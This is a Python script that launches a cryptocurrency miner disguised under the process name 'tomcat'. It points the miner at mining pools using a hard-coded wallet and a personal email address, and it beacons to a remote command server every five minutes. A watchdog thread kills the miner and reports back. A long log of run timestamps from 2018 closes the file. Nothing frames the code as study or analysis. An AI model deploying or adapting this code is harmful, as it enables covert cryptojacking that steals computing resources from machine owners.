import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:03.803719
#2018-02-17 16:41:04.003411
#2018-02-17 18:28:01.570137
#2018-02-17 20:17:05.247033
#2018-02-17 22:05:05.475558
#2018-02-17 23:49:06.802299
#2018-02-18 01:40:04.922553
#2018-02-18 03:27:05.160016
#2018-02-18 05:14:07.609787
#2018-02-18 07:07:04.967487
#2018-02-18 08:55:05.544476
#2018-02-18 10:42:03.498369
#2018-02-18 12:27:02.051571
#2018-02-18 14:15:01.651184
#2018-02-18 16:06:04.623498
#2018-02-18 17:54:05.196699
#2018-02-18 19:42:08.786760
#2018-02-18 21:27:03.298711
#2018-02-18 23:16:03.986231
#2018-02-19 01:02:04.282456
#2018-02-19 02:49:01.974264
#2018-02-19 04:34:07.572659
#2018-02-19 06:19:06.301957
#2018-02-19 08:07:07.308890
#2018-02-19 09:57:05.554901
#2018-02-19 11:47:09.245026
#2018-02-19 13:34:08.359178
#2018-02-19 15:23:05.710477
#2018-02-19 17:11:08.173474
#2018-02-19 18:57:07.535834
#2018-02-19 20:44:06.978651
#2018-02-19 22:31:07.759970
#2018-02-20 00:16:07.187361
#2018-02-20 02:03:03.963951
#2018-02-20 03:53:01.791499
#2018-02-20 05:36:01.602772
#2018-02-20 07:21:04.300767
#2018-02-20 09:07:05.486098
#2018-02-20 10:50:07.259991
#2018-02-20 12:36:08.801267
#2018-02-20 14:23:04.286778
#2018-02-20 16:08:05.811628
#2018-02-20 17:54:11.823360
#2018-02-20 19:46:01.919858
#2018-02-20 21:37:08.583083
#2018-02-20 23:18:08.210934
#2018-02-21 01:04:07.587373
#2018-02-21 02:52:06.785875
#2018-02-21 04:40:06.119676
#2018-02-21 06:27:07.347720
#2018-02-21 08:12:08.567834
#2018-02-21 09:59:05.798744
#2018-02-21 11:48:02.044144
#2018-02-21 13:38:08.063506
#2018-02-21 15:23:01.643659
#2018-02-21 17:13:08.402539
#2018-02-21 19:01:05.041112
#2018-02-21 20:47:08.260646
#2018-02-21 22:33:06.121901
#2018-02-22 00:23:08.246609
#2018-02-22 02:11:03.711956
#2018-02-22 03:57:02.105761
#2018-02-22 05:44:06.677432
#2018-02-22 07:32:07.011807
#2018-02-22 09:19:04.324180
#2018-02-22 11:06:06.325707
#2018-02-22 12:52:05.218838
#2018-02-22 14:41:01.814369
#2018-02-22 16:25:12.020959
#2018-02-22 18:12:13.263782
#2018-02-22 20:01:08.999014
#2018-02-22 21:51:07.667024
#2018-02-22 23:40:06.378351
#2018-02-23 01:29:02.209231
#2018-02-23 03:16:07.839806
#2018-02-23 05:02:04.987240
#2018-02-23 06:48:02.096359
#2018-02-23 08:39:05.429249
#2018-02-23 10:53:07.150250
#2018-02-23 12:50:08.586349
#2018-02-23 14:35:10.477020
#2018-02-23 16:24:07.502559
#2018-02-23 18:12:06.223958
#2018-02-23 19:57:01.858388
#2018-02-23 21:40:09.903767
#2018-02-23 23:33:07.686675
#2018-02-24 01:23:06.671325
#2018-02-24 03:15:09.116458
#2018-02-24 05:01:07.328760
#2018-02-24 06:49:05.297196
#2018-02-24 08:39:07.180090
#2018-02-24 10:23:03.281677
#2018-02-24 12:18:01.745411
#2018-02-24 14:11:05.484204
#2018-02-24 15:58:03.685780
#2018-02-24 17:49:05.389377
#2018-02-24 19:37:03.622305
#2018-02-24 21:24:01.697683
#2018-02-25 00:05:04.172359
#2018-02-25 03:19:04.031806
#2018-02-25 06:04:04.748231
#2018-02-25 10:38:01.398216
#2018-02-25 12:11:01.328904
#2018-02-25 14:23:01.742006
#2018-02-25 15:58:01.406492